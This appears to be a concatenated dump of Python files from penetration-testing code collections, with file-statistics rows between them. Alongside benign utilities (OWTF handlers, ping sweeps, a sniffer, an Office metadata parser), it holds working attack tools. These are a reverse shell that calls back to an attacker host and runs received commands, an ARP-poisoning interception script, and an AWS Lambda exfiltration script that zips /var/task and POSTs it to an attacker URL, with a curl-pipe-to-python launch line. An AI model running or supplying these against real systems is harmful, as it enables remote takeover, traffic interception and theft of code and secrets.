prepend_file = args.prepend_file # Filename to prepend to the usernames to the output file
domain_name = args.domain_name # The name of the domain to be appended to the username list
dir = os.getcwd() # Get current working directory
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if append_file and prepend_file:
sys.exit("[!] Please select either prepend or append for a file not both")
if not filename:
if os.name != "nt":
filename = dir + "/census_username_list"
else:
filename = dir + "\\census_username_list"
else:
if filename:
if "\\" or "/" in filename:
if verbose > 1:
print("[*] Using filename: %s") % (filename)
else:
if os.name != "nt":
filename = dir + "/" + filename
else:
filename = dir + "\\" + filename
if verbose > 1:
print("[*] Using filename: %s") % (filename)
# Define working variables
sur_dict = {}
user_dict = {}
user_list = []
sup_username = []
target = []
combined_users = []
# Process census file
if not census_file:
sys.exit("[!] You did not provide a census file!")
else:
sur_dict, user_dict, user_list = census_parser(census_file, verbose)
# Process supplemental username file
if append_file or prepend_file:
sup_username, target = username_file_parser(prepend_file, append_file, verbose)
combined_users = combine_usernames(sup_username, target, user_list, verbose)
else:
combined_users = user_list
write_username_file(combined_users, filename, domain_name, verbose)
| 43.00995 | 253 | 0.660373 |
owtf | """
owtf.lib.owtf_process
~~~~~~~~~~~~~~~~~~~~~
Consists of owtf process class and its manager
"""
from multiprocessing import Process, Queue
from owtf.db.session import get_scoped_session
from owtf.utils.error import setup_signal_handlers
from owtf.plugin.runner import runner
from owtf.utils.logger import OWTFLogger
__all__ = ["OWTFProcess"]
class OWTFProcess(Process):
"""
Implementing own proxy of Process for better control of processes launched
from OWTF both while creating and terminating the processes
"""
def __init__(self, **kwargs):
"""
Ideally not to override this but can be done if needed. If overridden
please give a call to super() and make sure you run this
"""
self.poison_q = Queue()
self._process = None
self.session = get_scoped_session()
self.plugin_handler = runner
self.logger = OWTFLogger()
setup_signal_handlers()
for key in list(kwargs.keys()): # Attach all kwargs to self
setattr(self, key, kwargs.get(key, None))
super(OWTFProcess, self).__init__()
def initialize(self, **kwargs):
"""
Supposed to be overridden if user wants to initialize something
"""
pass
def run(self):
"""This method must not be overridden by user
Sets proper logger with file handler and Formatter
and launches process specific code
:return: None
:rtype: None
"""
try:
self.logger.enable_logging()
self.pseudo_run()
except KeyboardInterrupt:
# In case of interrupt while listing plugins
pass
def pseudo_run(self):
"""
This method must be overridden by user with the process related code
"""
pass
| 27.123077 | 78 | 0.615764 |
cybersecurity-penetration-testing | import socket
import os
# host to listen on
host = "192.168.0.196"
# create a raw socket and bind it to the public interface
if os.name == "nt":
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind((host, 0))
# we want the IP headers included in the capture
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# if we're on Windows we need to send an IOCTL
# to setup promiscuous mode
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
# read in a single packet
print sniffer.recvfrom(65565)
# if we're on Windows turn off promiscuous mode
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
| 25.225806 | 75 | 0.698276 |
Python-Penetration-Testing-for-Developers | import os
import collections
import platform
import socket, subprocess,sys
import threading
from datetime import datetime
''' section 1 '''
net = raw_input("Enter the Network Address ")
net1= net.split('.')
a = '.'
net2 = net1[0]+a+net1[1]+a+net1[2]+a
st1 = int(raw_input("Enter the Starting Number "))
en1 = int(raw_input("Enter the Last Number "))
en1 =en1+1
dic = collections.OrderedDict()
#dic = collections.OrderedDict()
oper = platform.system()
if (oper=="Windows"):
ping1 = "ping -n 1 "
elif (oper== "Linux"):
ping1 = "ping -c 1 "
else :
ping1 = "ping -c 1 "
t1= datetime.now()
'''section 2'''
class myThread (threading.Thread):
def __init__(self,st,en):
threading.Thread.__init__(self)
self.st = st
self.en = en
def run(self):
run1(self.st,self.en)
'''section 3'''
def run1(st1,en1):
#print "Scanning in Progess"
for ip in xrange(st1,en1):
#print ".",
addr = net2+str(ip)
comm = ping1+addr
response = os.popen(comm)
for line in response.readlines():
if(line.count("TTL")):
break
if (line.count("TTL")):
#print addr, "--> Live"
dic[ip]= addr
''' Section 4 '''
total_ip =en1-st1
tn =20 # number of ip handled by one thread
total_thread = total_ip/tn
total_thread=total_thread+1
threads= []
try:
for i in xrange(total_thread):
en = st1+tn
if(en >en1):
en =en1
thread = myThread(st1,en)
thread.start()
threads.append(thread)
st1 =en
except:
print "Error: unable to start thread"
print "\tNumber of Threads active:", threading.activeCount()
for t in threads:
t.join()
print "Exiting Main Thread"
dict = collections.OrderedDict(sorted(dic.items()))
for key in dict:
print dict[key],"-->" "Live"
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 21.934211 | 60 | 0.660735 |
Python-Penetration-Testing-Cookbook | import pyshark
cap = pyshark.LiveCapture(interface='en0', bpf_filter='ip and tcp port 80')
cap.sniff(timeout=5)
for pkt in cap:
print(pkt.highest_layer) | 21.285714 | 75 | 0.748387 |
cybersecurity-penetration-testing | import socket
import subprocess
import sys
import time
HOST = '172.16.0.2' # Your attacking machine to connect back to
PORT = 4444 # The port your attacking machine is listening on
def connect((host, port)):
go = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
go.connect((host, port))
return go
def wait(go):
data = go.recv(1024)
if data == "exit\n":
go.close()
sys.exit(0)
elif len(data)==0:
return True
else:
p = subprocess.Popen(data, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
stdout = p.stdout.read() + p.stderr.read()
go.send(stdout)
return False
def main():
while True:
dead=False
try:
go=connect((HOST,PORT))
while not dead:
dead=wait(go)
go.close()
except socket.error:
pass
time.sleep(2)
if __name__ == "__main__":
sys.exit(main())
| 22.372093 | 72 | 0.563745 |
owtf | """
owtf.api.handlers.base
~~~~~~~~~~~~~~~~~~~~~~
"""
import json
import re
import uuid
from tornado.escape import url_escape
from tornado.web import RequestHandler
from owtf import __version__
from owtf.db.session import Session, get_db_engine
from owtf.lib.exceptions import APIError
from owtf.settings import (
SERVER_PORT,
FILE_SERVER_PORT,
USE_SENTRY,
SERVER_ADDR,
SESSION_COOKIE_NAME,
)
from owtf.utils.strings import utf8
# if Sentry raven library around, pull in SentryMixin
try:
from raven.contrib.tornado import SentryMixin
except ImportError:
pass
else:
class SentryHandler(SentryMixin, RequestHandler):
pass
if USE_SENTRY:
RequestHandler = SentryHandler
__all__ = ["APIRequestHandler", "FileRedirectHandler", "UIRequestHandler"]
# pattern for the authentication token header
auth_header_pat = re.compile(r"^(?:token|bearer)\s+([^\s]+)$", flags=re.IGNORECASE)
class BaseRequestHandler(RequestHandler):
def set_default_headers(self):
self.add_header("X-OWTF-Version", __version__)
self.add_header("X-Frame-Options", "SAMEORIGIN")
self.add_header("X-XSS-Protection", "1; mode=block")
self.add_header("X-Content-Type-Options", "nosniff")
self.add_header("Referrer-Policy", "strict-origin-when-cross-origin")
self.add_header("Cache-Control", "no-cache,no-store,max-age=0,must-revalidate")
self.add_header("Pragma", "no-cache")
self.add_header("Expires", "-1")
class APIRequestHandler(BaseRequestHandler):
def initialize(self):
"""
- Set Content-type for JSON
"""
Session.configure(bind=get_db_engine())
self.session = Session()
# Decode byte string and turn it in to a character (Unicode) string.
self.request.arguments = {
key: [value.decode("utf8") for value in value_list] for key, value_list in self.request.arguments.items()
}
self.set_header("Content-Type", "application/json")
def on_finish(self):
self.session.close()
def write(self, chunk):
if isinstance(chunk, list):
super(APIRequestHandler, self).write(json.dumps(chunk))
else:
super(APIRequestHandler, self).write(chunk)
def success(self, data):
"""When an API call is successful, the JSend object is used as a simple
envelope for the results, using the data key.
:type data: A JSON-serializable object
:param data: Acts as the wrapper for any data returned by the API
call. If the call returns no data, data should be set to null.
"""
self.write({"status": "success", "data": data})
self.finish()
def fail(self, data):
"""There was a problem with the data submitted, or some pre-condition
of the API call wasn't satisfied.
:type data: A JSON-serializable object
:param data: Provides the wrapper for the details of why the request
failed. If the reasons for failure correspond to POST values,
the response object's keys SHOULD correspond to those POST values.
"""
self.write({"status": "fail", "data": data})
self.finish()
def error(self, message, data=None, code=None):
"""An error occurred in processing the request, i.e. an exception was
thrown.
:type data: A JSON-serializable object
:param data: A generic container for any other information about the
error, i.e. the conditions that caused the error,
stack traces, etc.
:type message: A JSON-serializable object
:param message: A meaningful, end-user-readable (or at the least
log-worthy) message, explaining what went wrong
:type code: int
:param code: A numeric code corresponding to the error, if applicable
"""
result = {"status": "error", "message": message}
if data:
result["data"] = data
if code:
result["code"] = code
self.write(result)
self.finish()
def write_error(self, status_code, **kwargs):
"""Override of RequestHandler.write_error
Calls ``error()`` or ``fail()`` from JSendMixin depending on which
exception was raised with provided reason and status code.
:type status_code: int
:param status_code: HTTP status code
"""
def get_exc_message(exception):
return exception.log_message if hasattr(exception, "log_message") else str(exception)
self.clear()
self.set_status(status_code)
try:
exception = utf8(kwargs["exc_info"][1])
except:
exception = b""
if any(isinstance(exception, c) for c in [APIError]):
# ValidationError is always due to a malformed request
if not isinstance(exception, APIError):
self.set_status(400)
self.write({"status": "fail", "data": get_exc_message(exception)})
self.finish()
else:
self.write(
{
"status": "fail",
"message": self._reason,
"data": get_exc_message(exception),
"code": status_code,
}
)
self.finish()
def get_auth_token(self):
"""Get the authorization token from Authorization header"""
auth_header = self.request.headers.get("Authorization", "")
match = auth_header_pat.match(auth_header)
if not match:
return None
return match.group(1)
class UIRequestHandler(BaseRequestHandler):
def reverse_url(self, name, *args):
url = super(UIRequestHandler, self).reverse_url(name, *args)
url = url.replace("?", "")
return url.split("None")[0]
def _set_cookie(self, key, value, encrypted=True, **overrides):
"""Setting any cookie should go through here
if encrypted use tornado's set_secure_cookie,
otherwise set plaintext cookies.
"""
# tornado <4.2 have a bug that consider secure==True as soon as
# 'secure' kwarg is passed to set_secure_cookie
kwargs = {"httponly": True}
if self.request.protocol == "https":
kwargs["secure"] = True
kwargs["domain"] = SERVER_ADDR
kwargs.update(overrides)
if encrypted:
set_cookie = self.set_secure_cookie
else:
set_cookie = self.set_cookie
self.application.log.debug("Setting cookie %s: %s", key, kwargs)
set_cookie(key, value, **kwargs)
def _set_user_cookie(self, user, server):
self.application.log.debug("Setting cookie for %s: %s", user.name, server.cookie_name)
self._set_cookie(server.cookie_name, user.cookie_id, encrypted=True, path=server.base_url)
def get_session_cookie(self):
"""Get the session id from a cookie
Returns None if no session id is stored
"""
return self.get_cookie(SESSION_COOKIE_NAME, None)
def set_session_cookie(self):
"""Set a new session id cookie
new session id is returned
Session id cookie is *not* encrypted,
so other services on this domain can read it.
"""
session_id = uuid.uuid4().hex
self._set_cookie(SESSION_COOKIE_NAME, session_id, encrypted=False)
return session_id
@property
def template_context(self):
user = self.get_current_user()
return dict(user=user)
class FileRedirectHandler(BaseRequestHandler):
SUPPORTED_METHODS = ["GET"]
def get(self, file_url):
output_files_server = "{}://{}/".format(
self.request.protocol,
self.request.host.replace(str(SERVER_PORT), str(FILE_SERVER_PORT)),
)
redirect_file_url = output_files_server + url_escape(file_url, plus=False)
self.redirect(redirect_file_url, permanent=True)
| 33.834783 | 117 | 0.613282 |
cybersecurity-penetration-testing | from scapy.all import *
import os
import sys
import threading
interface = "en1"
target_ip = "172.16.1.71"
gateway_ip = "172.16.1.254"
packet_count = 1000
poisoning = True
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
# slightly different method using send
print "[*] Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
def get_mac(ip_address):
responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
# return the MAC address from a response
for s,r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
global poisoning
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst= target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst= gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while poisoning:
send(poison_target)
send(poison_gateway)
time.sleep(2)
print "[*] ARP poison attack finished."
return
# set our interface
conf.iface = interface
# turn off output
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
# start poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
except KeyboardInterrupt:
pass
finally:
# write out the captured packets
print "[*] Writing packets to arper.pcap"
wrpcap('arper.pcap',packets)
poisoning = False
# wait for poisoning thread to exit
time.sleep(2)
# restore the network
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
| 24.311321 | 107 | 0.653244 |
cybersecurity-penetration-testing | import os
import collections
import platform
import socket, subprocess,sys
import threading
from datetime import datetime
''' section 1 '''
net = raw_input("Enter the Network Address ")
net1= net.split('.')
a = '.'
net2 = net1[0]+a+net1[1]+a+net1[2]+a
st1 = int(raw_input("Enter the Starting Number "))
en1 = int(raw_input("Enter the Last Number "))
en1 =en1+1
list1 = []
oper = platform.system()
if (oper=="Windows"):
ping1 = "ping -n 1 "
elif (oper== "Linux"):
ping1 = "ping -c 1 "
else :
ping1 = "ping -c 1 "
t1= datetime.now()
'''section 2'''
class myThread (threading.Thread):
def __init__(self,st,en):
threading.Thread.__init__(self)
self.st = st
self.en = en
def run(self):
run1(self.st,self.en)
'''section 3'''
def run1(st1,en1):
#print "Scanning in Progess"
for ip in xrange(st1,en1):
#print ".",
addr = net2+str(ip)
comm = ping1+addr
response = os.popen(comm)
for line in response.readlines():
if(line.count("TTL")):
break
if (line.count("TTL")):
#print addr, "--> Live"
list1.append(addr)
''' Section 4 '''
total_ip =en1-st1
tn =20 # number of ip handled by one thread
total_thread = total_ip/tn
total_thread=total_thread+1
threads= []
try:
for i in xrange(total_thread):
en = st1+tn
if(en >en1):
en =en1
thread = myThread(st1,en)
thread.start()
threads.append(thread)
st1 =en
except:
print "Error: unable to start thread"
print "\tNumber of Threads active:", threading.activeCount()
for t in threads:
t.join()
print "Exiting Main Thread"
list1.sort()
for key in list1:
print key,"-->" "Live"
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 20.723684 | 60 | 0.653333 |
owtf | """
owtf.api.handlers.config
~~~~~~~~~~~~~~~~~~~~~~~~
"""
from owtf.api.handlers.base import APIRequestHandler
from owtf.lib import exceptions
from owtf.lib.exceptions import APIError
from owtf.managers.config import get_all_config_dicts, update_config_val
__all__ = ["ConfigurationHandler"]
class ConfigurationHandler(APIRequestHandler):
"""Update framework settings and tool paths."""
SUPPORTED_METHODS = ["GET", "PATCH"]
def get(self):
"""Return all configuration items.
**Example request**:
.. sourcecode:: http
GET /api/v1/configuration HTTP/1.1
Accept: application/json
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"data": [
{
"dirty": false,
"key": "ATTACHMENT_NAME",
"descrip": "Filename for the attachment to be sent",
"section": "AUX_PLUGIN_DATA",
"value": "report"
},
{
"dirty": false,
"key": "BRUTEFORCER",
"descrip": "",
"section": "DICTIONARIES",
"value": "hydra"
},
]
}
"""
filter_data = dict(self.request.arguments)
configurations = get_all_config_dicts(self.session, filter_data)
grouped_configurations = {}
for config in configurations:
if config["section"] not in grouped_configurations:
grouped_configurations[config["section"]] = []
grouped_configurations[config["section"]].append(config)
self.success(grouped_configurations)
def patch(self):
"""Update configuration item
**Example request**:
.. sourcecode:: http
PATCH /api/v1/configuration/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"status": "success",
"data": null
}
"""
for key, value_list in list(self.request.arguments.items()):
try:
update_config_val(self.session, key, value_list[0])
self.success(None)
except exceptions.InvalidConfigurationReference:
raise APIError(422, "Invalid configuration item specified")
| 27.783505 | 76 | 0.505912 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: June 2015
Name: multi_threaded.py
Purpose: To identify live web applications with a list of IP addresses, using concurrent threads
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import urllib2, argparse, sys, threading, logging, Queue, time
queue = Queue.Queue()
lock = threading.Lock()
class Agent(threading.Thread):
def __init__(self, queue, logger, verbose):
threading.Thread.__init__(self)
self.queue = queue
self.logger = logger
self.verbose = verbose
def run(self):
while True:
host = self.queue.get()
print("[*] Testing %s") % (str(host))
target = "http://" + host
target_secure = "https://" + host
try:
request = urllib2.Request(target)
request.get_method = lambda : 'HEAD'
response = urllib2.urlopen(request)
except:
with lock:
self.logger.debug("[-] No web server at %s reported by thread %s" % (str(target), str(threading.current_thread().name)))
print("[-] No web server at %s reported by thread %s") % (str(target), str(threading.current_thread().name))
response = None
if response != None:
with lock:
self.logger.debug("[+] Response from %s reported by thread %s" % (str(target), str(threading.current_thread().name)))
print("[*] Response from insecure service on %s reported by thread %s") % (str(target), str(threading.current_thread().name))
self.logger.debug(response.info())
try:
target_secure = urllib2.urlopen(target_secure)
request_secure.get_method = lambda : 'HEAD'
response_secure = urllib2.urlopen(request_secure)
except:
with lock:
self.logger.debug("[-] No secure web server at %s reported by thread %s" % (str(target_secure), str(threading.current_thread().name)))
print("[-] No secure web server at %s reported by thread %s") % (str(target_secure), str(threading.current_thread().name))
response_secure = None
if response_secure != None:
with lock:
self.logger.debug("[+] Secure web server at %s reported by thread %s" % (str(target_secure), str(threading.current_thread().name)))
print("[*] Response from secure service on %s reported by thread %s") % (str(target_secure), str(threading.current_thread().name))
self.logger.debug(response_secure.info())
# Execution is complete
self.queue.task_done()
def main():
# If script is executed at the CLI
usage = '''usage: %(prog)s [-t hostfile] [-m threads] [-f filename] [-l logfile.log] [-m 2] -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-t", action="store", dest="targets", default=None, help="Filename for hosts to test")
parser.add_argument("-f", "--filename", type=str, action="store", dest="filename", default="xml_output", help="The filename that will be used to create an XLSX")
parser.add_argument("-m", "--multi", action="store", dest="threads", default=1, type=int, help="Number of threads, defaults to 1")
parser.add_argument("-l", "--logfile", action="store", dest="log", default="results.log", type=str, help="The log file to output the results")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
args = parser.parse_args()
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if (args.targets == None):
parser.print_help()
sys.exit(1)
# Set Constructors
targets = args.targets # Targets to be parsed
verbose = args.verbose # Verbosity level
threads = args.threads # Threads to be used
log = args.log # Configure the log output file
if ".log" not in log:
log = log + ".log"
level = logging.DEBUG # Logging level
format = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s") # Log format
logger_obj = logging.getLogger() # Getter for logging agent
file_handler = logging.FileHandler(args.log) # File Handler
#stderr_handler = logging.StreamHandler() # STDERR Handler
targets_list = []
# Configure logger formats for STDERR and output file
file_handler.setFormatter(format)
#stderr_handler.setFormatter(format)
# Configure logger object
logger_obj.addHandler(file_handler)
#logger_obj.addHandler(stderr_handler)
logger_obj.setLevel(level)
# Load the targets into a list and remove trailing "\n"
with open(targets) as f:
targets_list = [line.rstrip() for line in f.readlines()]
# Spawn workers to access site
for thread in range(0, threads):
worker = Agent(queue, logger_obj, verbose)
worker.setDaemon(True)
worker.start()
# Build queue of work
for target in targets_list:
queue.put(target)
# Wait for the queue to finish processing
queue.join()
if __name__ == '__main__':
main()
| 51.992958 | 165 | 0.604466 |
cybersecurity-penetration-testing | import zipfile
import os
from time import gmtime, strftime
from lxml import etree
import processors
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = 'This scripts parses embedded metadata from office files'
def officeParser(filename):
"""
The officeParser function confirms the file type and sends it to be processed.
:param filename: name of the file potentially containing embedded metadata.
:return: A dictionary from getTags, containing the embedded embedded metadata.
"""
# DOCX, XLSX, and PPTX signatures
signatures = ['504b030414000600']
if processors.utility.checkHeader(filename, signatures, 8) == True:
return getTags(filename)
else:
print 'File signature does not match known Office Document signatures.'
raise TypeError('File signature does not match known Office Document signatures.')
def getTags(filename):
"""
The getTags function extracts the office metadata from the data object.
:param filename: the path and name to the data object.
:return: tags and headers, tags is a dictionary containing office metadata and headers are the
order of keys for the CSV output.
"""
# Set up CSV headers
headers = ['Path', 'Name', 'Size', 'Filesystem CTime', 'Filesystem MTime', 'Title', 'Author(s)','Create Date',
'Modify Date', 'Last Modified By Date', 'Subject', 'Keywords', 'Description', 'Category', 'Status',
'Revision', 'Edit Time (Min)', 'Page Count', 'Word Count', 'Character Count', 'Line Count',
'Paragraph Count', 'Slide Count', 'Note Count', 'Hidden Slide Count', 'Company', 'Hyperlink Base']
# Create a ZipFile class from the input object. This allows us to read or write to the 'Zip archive'.
zf = zipfile.ZipFile(filename)
# These two XML files contain the embedded metadata of interest.
try:
core = etree.fromstring(zf.read('docProps/core.xml'))
app = etree.fromstring(zf.read('docProps/app.xml'))
except KeyError, e:
assert Warning(e)
return {}, headers
tags = {}
tags['Path'] = filename
tags['Name'] = os.path.basename(filename)
tags['Size'] = processors.utility.convertSize(os.path.getsize(filename))
tags['Filesystem CTime'] = strftime('%m/%d/%Y %H:%M:%S', gmtime(os.path.getctime(filename)))
tags['Filesystem MTime'] = strftime('%m/%d/%Y %H:%M:%S', gmtime(os.path.getmtime(filename)))
# Core Tags
for child in core.iterchildren():
if 'title' in child.tag:
tags['Title'] = child.text
if 'subject' in child.tag:
tags['Subject'] = child.text
if 'creator' in child.tag:
tags['Author(s)'] = child.text
if 'keywords' in child.tag:
tags['Keywords'] = child.text
if 'description' in child.tag:
tags['Description'] = child.text
if 'lastModifiedBy' in child.tag:
tags['Last Modified By Date'] = child.text
if 'created' in child.tag:
tags['Create Date'] = child.text
if 'modified' in child.tag:
tags['Modify Date'] = child.text
if 'category' in child.tag:
tags['Category'] = child.text
if 'contentStatus' in child.tag:
tags['Status'] = child.text
if filename.endswith('.docx') or filename.endswith('.pptx'):
if 'revision' in child.tag:
tags['Revision'] = child.text
# App Tags
for child in app.iterchildren():
if filename.endswith('.docx'):
if 'TotalTime' in child.tag:
tags['Edit Time (Min)'] = child.text
if 'Pages' in child.tag:
tags['Page Count'] = child.text
if 'Words' in child.tag:
tags['Word Count'] = child.text
if 'Characters' in child.tag:
tags['Character Count'] = child.text
if 'Lines' in child.tag:
tags['Line Count'] = child.text
if 'Paragraphs' in child.tag:
tags['Paragraph Count'] = child.text
if 'Company' in child.tag:
tags['Company'] = child.text
if 'HyperlinkBase' in child.tag:
tags['Hyperlink Base'] = child.text
elif filename.endswith('.pptx'):
if 'TotalTime' in child.tag:
tags['Edit Time (Min)'] = child.text
if 'Words' in child.tag:
tags['Word Count'] = child.text
if 'Paragraphs' in child.tag:
tags['Paragraph Count'] = child.text
if 'Slides' in child.tag:
tags['Slide Count'] = child.text
if 'Notes' in child.tag:
tags['Note Count'] = child.text
if 'HiddenSlides' in child.tag:
tags['Hidden Slide Count'] = child.text
if 'Company' in child.tag:
tags['Company'] = child.text
if 'HyperlinkBase' in child.tag:
tags['Hyperlink Base'] = child.text
else:
if 'Company' in child.tag:
tags['Company'] = child.text
if 'HyperlinkBase' in child.tag:
tags['Hyperlink Base'] = child.text
return tags, headers
| 38.686567 | 114 | 0.586797 |
cybersecurity-penetration-testing | #!/usr/bin/env python
#
# This script can be used to exfiltrate all of the AWS Lambda source files from
# $LAMBDA_TASK_ROOT (typically: /var/task) in a form of out-of-band http/s POST
# request. Such request will contain an `exfil` variable with urlencode(base64(zip_file)) in it.
# This zip file then will contain all of the $LAMBDA_TASK_ROOT (/var/task) directory contents.
#
# Can be used with webhook.site, using similar OS command as following:
#
# $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
#
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
#
import zipfile, StringIO
import base64, os, sys
import urllib, urllib2, ssl
#
# Set below address to the HTTP(S) web server that will receive exfiltrated
# ZIP file in a form of a HTTP POST request (within parameter 'exfil')
#
EXFILTRATE_OUTBAND_ADDRESS = 'https://<ATTACKER>/lambda-exfil'
class InMemoryZip(object):
# Source:
# - https://www.kompato.com/post/43805938842/in-memory-zip-in-python
# - https://stackoverflow.com/a/2463818
def __init__(self):
self.in_memory_zip = StringIO.StringIO()
def append(self, filename_in_zip, file_contents):
zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED, False)
zf.writestr(filename_in_zip, file_contents)
for zfile in zf.filelist:
zfile.create_system = 0
return self
def read(self):
self.in_memory_zip.seek(0)
return self.in_memory_zip.read()
def fetch_files(imz, rootdir):
for folder, subs, files in os.walk(rootdir):
for filename in files:
real_path = os.path.join(folder, filename)
with open(real_path, 'r') as src:
zip_path = real_path.replace(rootdir + '/', '')
imz.append(zip_path, src.read())
def post(data):
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
}
data = {'exfil': base64.b64encode(data)}
data = urllib.urlencode(data)
ssl._create_default_https_context = ssl._create_unverified_context
r = urllib2.Request(EXFILTRATE_OUTBAND_ADDRESS, data=data, headers=headers)
resp = urllib2.urlopen(r)
if resp: resp.read()
def main():
rootdir = os.environ['LAMBDA_TASK_ROOT']
imz = InMemoryZip()
fetch_files(imz, rootdir)
post(imz.read())
try:
main()
except:
pass
| 31.4 | 96 | 0.653416 |
Mastering-Machine-Learning-for-Penetration-Testing | from pandas import read_csv
from sklearn.feature_selection import RFE
from sklearn.linear_model import LogisticRegression
# load data
url = "https://raw.githubusercontent.com/jbrownlee/Datasets/master/pima-indians-diabetes.data.csv"
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = read_csv(url, names=names)
array = dataframe.values
X = array[:,0:8]
Y = array[:,8]
# feature extraction
model = LogisticRegression()
rfe = RFE(model, 3)
fit = rfe.fit(X, Y)
print("Num Features: %d") % fit.n_features_
print("Selected Features: %s") % fit.support_
print("Feature Ranking: %s") % fit.ranking_
| 34.277778 | 98 | 0.712934 |
cybersecurity-penetration-testing | __author__ = 'Preston Miller & Chapin Bryce'
__version__ = '20150822'
__date__ = '0.01'
import urllib
import ast
class IPtoGeo(object):
def __init__(self, ip_address):
# Initialize objects to store
self.latitude = ''
self.longitude = ''
self.country = ''
self.city = ''
self.ip_address = ip_address
self._get_location()
def _get_location(self):
"""
Retrieve initial location data (contry, city, lat/long) from hostip.info
:return:
"""
request = urllib.urlopen('http://api.hostip.info/get_json.php?ip=%s&position=true' % self.ip_address).read()
json_request = ast.literal_eval(request)
self.country = json_request['country_name']
self.country_code = json_request['country_code']
self.city = json_request['city']
self.latitude = json_request['lat']
self.longitude = json_request['lng']
if __name__ == '__main__':
ip1 = IPtoGeo('8.8.8.8')
ip2 = IPtoGeo('12.215.42.19')
print ip1.__dict__
print ip2.__dict__ | 26.025 | 116 | 0.575926 |
Python-Penetration-Testing-for-Developers | #Linear Conruential Generator reverse from known mod, multiplier and increment + final 2 chars of each random value
#Replace hardcode numbers with known numbers
print "Starting attempt to brute"
